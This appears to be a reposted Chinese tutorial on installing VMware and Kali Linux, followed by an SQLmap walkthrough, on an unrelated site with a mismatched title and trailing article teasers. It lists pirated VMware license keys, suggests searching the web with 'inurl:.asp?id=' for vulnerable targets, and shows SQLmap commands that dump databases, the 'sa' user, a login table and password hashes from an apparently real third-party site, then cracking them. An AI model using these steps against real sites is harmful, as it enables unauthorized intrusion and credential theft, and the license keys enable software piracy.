肥宅钓鱼网
当前位置: 首页 钓鱼百科

win10自带虚拟机安装kali报错(网络安全.虚拟机VMware)

时间:2023-08-04 作者: 小编 阅读量: 1 栏目名: 钓鱼百科

Sqlmap是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。通过人为猜解,知道登录表位usr。

一.虚拟机安装

1.首先需要下载VMware虚拟机,并对其进行安装。下载地址:https://www.vmware.com/cn.html

2.选择合适的版本进行下载,作者这里安装的版本为“VMware-workstation-full-12.5.2-4638234.ext”,并且上传至百度云分享给大家。

3.双击EXE文件,开始进行安装。

4.安装完成之后输入序列号激活。

5A02H-AU243-TZJ49-GTC7K-3C61N VF5XA-FNDDJ-085GZ-4NXZ9-N20E6UC5MR-8NE16-H81WY-R7QGV-QG2D8ZG1WH-ATY96-H80QP-X7PEX-Y30V4AA3E0-0VDE1-0893Z-KGZ59-QGAVF

5.运行VMware软件如下图所示,接下来需要进行第二部分的Kali配置。

二.创建虚拟机并载入Kali Linux

1.去Kali官网Downloads页面下载64位Kali Linux的torrent文件,再通过迅雷下载。下载地址:https://www.kali.org/downloads/,作者百度云网盘已上传。

2.下载成功后,新建虚拟机,选择“自定义”设置。

3.导入下载好的Kali Linux镜像文件,选择操作系统为Linux。

4.输入虚拟机的名称和安装位置。

5.设置内存分配大小,建议不要超过提示的最大内存推荐。

6.接着点击下一步,包括。

7.选择磁盘容量大小,建议比分配容量大些,并设为。

8.创建完成之后,如下图所示。

三.安装Kali Linux

1.开启虚拟机,进入安装界面,如下图所示,点击“开启此虚拟机”。

2.选择安装方式为“Graphical install”。

3.选择语言“中文简体”和地区“中国”,点击“继续”按钮安装。

4.自定义主机名,默认为“kali”,域名直接跳过即可。

5.设置用户密码,这是类似于Windows的开机密码,接着安装。

6.设置磁盘分区。

7.接着接续安装。

8.在询问是否要选择网络镜像时,如果你的网络很好可以选择是,这里我选择否。

下面这个GRUB安装至硬盘要选择“是”!

9.安装成功之后,等待系统重启即安装完成。

10.最终界面如下图所示。

Kali其他设置包括分辨率、中文输入、全屏显示等,请同学们自行百度学习。

四.Kali功能介绍

1.信息收集

2.漏洞分析

3.Web程序

4.数据库评估软件

5.密码攻击

6.无线攻击

7.逆向工程

8.漏洞利用工具集

9.嗅探/欺骗

10.权限维护

11.数字取证

12.报告工具集

13.Social Engineering Tools

打开某个软件,如下图所示。

五.SQLmap基本用法

下面作者结合Sqlmap简单讲述一个Kali环境中的实战案例。

Web漏洞包括网站本身漏洞、软件漏洞、服务器漏洞、外部攻击等,其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。

Sqlmap 是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

Sqlmap的基本流程如下:

找注入点并检测:sqlmap –u “链接”

列库显示数据库:sqlmap –u “链接” --dbs

列表显示表:sqlmap –u “链接” –D 数据库 --tables

列字段显示表中字段: sqlmap –u “链接” –D 数据库 –T 表名 --columns

爆内容显示字段内容:sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 --dump

作者本来想以“实验吧”的CTF题目作为测试地址(http://ctf5.shiyanbar.com/8/index.php?id=1),但最近它维修中,无法访问;但使用“inurl:.asp?id=”未能搜索到目标网站。希望读者后续尝试“实验吧”的那个例子,或者自行搭建本地网站环境进行SQL注入学习。

第一步:寻找目标网站,通过浏览器“inurl:.asp?id=”搜索,寻找存在SQL注入漏洞的目标,可以先尝试手工注入判断。

判断注入点的方法很多,比如show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。

(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=1 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=1恒成立,注释(–)掉后面语句。

(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=2 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=2恒错误,注释(–)掉后面语句。

但很多网站都会有防火墙,防止SQL注入,如下图所示。

第二步:打开Kali环境中的Sqlmap环境,如下图所示。(后续采用之前的文章进行讲解,也希望读者自己尝试下)

第三步:获取所有数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs

运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。

第四步:获取当前数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db

运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。

第五步:获取数据库当前用户。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user

运行结果如下图所示,获取当前数据库用户sa。

第六步:获取数据库所有用户和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords

运行结果如下图所示,获取数据库用户和密码。

第七步:获取数据库所有表。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables

运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。通过人为猜解,知道登录表位usr。

第八步:获取数据库登录表所有字段。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

运行结果如下图所示,获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,–columns表示usr表所有列。

是不是感觉到了SQLMAP的强大,其中用户名usr_name、密码passwd。

第九步:获取数据库登录表用户名和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump

获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出所有值。

如果字段内容太多,可以设置输出个数,如10个用户名和密码。参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示,再通过md5解密即可。

六.总结

又忙了16个小时,发现自己网络安全方向的基础非常薄弱,有太多实践知识想学,太多学术论文想看,每天都在忙碌,过程非常艰辛,博士哪有这么好毕业。但是这种苦中带甜,充实的滋味又让我陶醉,还有远方的女神、许多朋友和博友的陪伴。希望未来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深入点,多读文献,多找创新,加油。

天行健,君子以自强不息。

地势坤,君子以厚德载物。

最后希望基础性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。

    推荐阅读
  • 黑鲨手机是什么系统(用什么光圈)

    以下内容大家不妨参考一二希望能帮到您!黑鲨手机是什么系统黑鲨游戏手机搭载基于安卓Oreo(8.0)深度定制;JOYUI黑鲨新机配置方面搭载骁龙845处理器,配备8GB内存,运行Android8.0系统,采用18:9全面屏设计。黑鲨游戏手机搭载了高通骁龙845处理器,最高配备8GB存+128GB存储,后置1200万+2000万像素摄像头,光圈为F/1.75,前置摄像头为2000万像素,光圈为F/2.2,电池容量为4000mAh,运行JOYUI系统。

  • 电动汽车的历史发展简述(汽车发明百年来最深刻变革)

    在排放法规、能耗的双重压力驱动下,电动化已然成为全球汽车产业公认的未来演化方向。在今年初举办的2019年度股东大会上,奥迪管理董事就发布了企业战略重组计划,宣布要加速实施电动化战略和公司全面脱碳计划。预计到2025年,奥迪的电动化车型销量将占到其全球总销量的40%左右。2019年新能源汽车补贴大幅退坡,并将于2020年底正式退出,届时新能源汽车将完全交由市场竞争。

  • 历史上花木兰是真实存在的吗(古代官方记载花木兰亳之谯人)

    碑经专家鉴定,确属元代石刻真品。二是兴建假文物,对文化遗产进行不恰当的商业利用和运营,过度的商业炒作和破坏性开发,使文化遗产遭到不同程度的破坏。三是盲目举办祭拜活动,缺乏严肃性,造成传统文化内涵被严重扭曲。文帝大征天下民以御,木兰父当往,而年已老迈,弟尚年幼。木兰替父从军,为国家立下汗马功劳,却不受皇上封赏,解甲归田。木兰写好,置于案上。

  • 15万预算买什么suv最有面子(想要选一台15万左右的SUV)

    15万这个价格区间涌现出了很多SUV产品,这些车型的共同特点就是针对年轻人打造,拥有丰富的玩法。今天就由我来介绍两款比较有代表性的SUV车型,看看究竟哪款更适合你。前脸使用了封闭式的进气格栅,以凸显其电动车的身份。侧面是SUV和MPV结合的造型,较短的车头把空间尽量留给车厢。奇瑞欧萌达售价:9.29万-12.69万元奇瑞欧萌达是奇瑞目前最新的一款SUV产品,与此前的奇瑞车型不同,这款新车使用了一套全新的设计语言。

  • 红烧肉怎么做不柴又嫩(怎样做出来的红烧肉又嫩又好吃)

    以下内容希望对你有帮助!红烧肉怎么做不柴又嫩原料:五花肉500克、酱油3汤匙、绍酒2汤匙、糖3汤匙、大料2颗、盐适量、葱段、姜片各适量。

  • 感情用事的意思是什么意思(感情用事指的是什么)

    我们一起去了解并探讨一下这个问题吧!感情用事的意思是什么意思感情用事的意思是凭个人的爱憎或一时的感情冲动处理事情。

  • 长虹芯片华为造(华为发AI战略长虹加速转型)

    英特尔最新公布的数据给出结果,英特尔对此作出预测,自动驾驶汽车将在未来50年内全面普及。这项针对美国消费者调查发现,目前有21%美国人愿意改用自动驾驶汽车,但高达63%的被调查者认为今后50年内自动驾驶汽车将全面普及。这一未来愿景与早前英特尔的一项研究相吻合,英特尔预测在2050年以前,以乘客为中心的未来产值将达到7万亿美元。作为华为首款AI智能音箱,售价399元。

  • 未来世界五年发展大趋势(世界现代化版图的东方巨变)

    今天,中国共产党带领中国人民励精图治,将其刻写在960多万平方公里的华夏大地上。作为人类社会现代化超大样本,中国式现代化道路的开创,无疑将改写世界历史进程,深刻影响人类进步方向。中国14亿多人口整体迈入现代化社会,规模超过现有发达国家总和,将彻底改写现代化的世界版图,在人类历史上是一件有深远影响的大事。主席以中国智慧引领全球治理理念创新,站在人类前途命运高度为全球治理体系变革明确了方向。

  • 职校什么专业比较热门(特色专业选热门专业)

    2020年的高考因疫情显得十分特殊,这一届的考生们也注定不平凡。今年虽然是特殊的一年,但是和高考相关的搜索热度不减,创下近5年新高,和去年相比涨达248%!据国内权威数据统计,未来五年,我国信息化人才总需求量高达1500万—2000万人。(最终专业名称、专业代码、计划数及收费标准以成都市教育考试院统一公布为准。学生中考后在第三批第一志愿进行填报,学校代码51131,51931。未参加升大学的学生由学校统一推荐就业。

  • 技术推动美国经济增长(美国火上浇油殃及全球经济)

    欧洲应该意识到,追随美国制裁俄罗斯,最终受伤的可能是自己。美国政府此次发起的制裁意在大规模冲击俄罗斯经济。对于由此给世界经济造成的损害,报告称之为附带损害。乌克兰危机及其可能引发的长期后果,加上美国10%的高通胀和美联储激进加息,无疑将影响美国经济复苏。鉴于俄罗斯和乌克兰在全球农业市场上至关重要,联合国警告称,全世界面临严峻的粮食问题。种种信息表明,中国政府将大力支持经济增长,增加财政支出。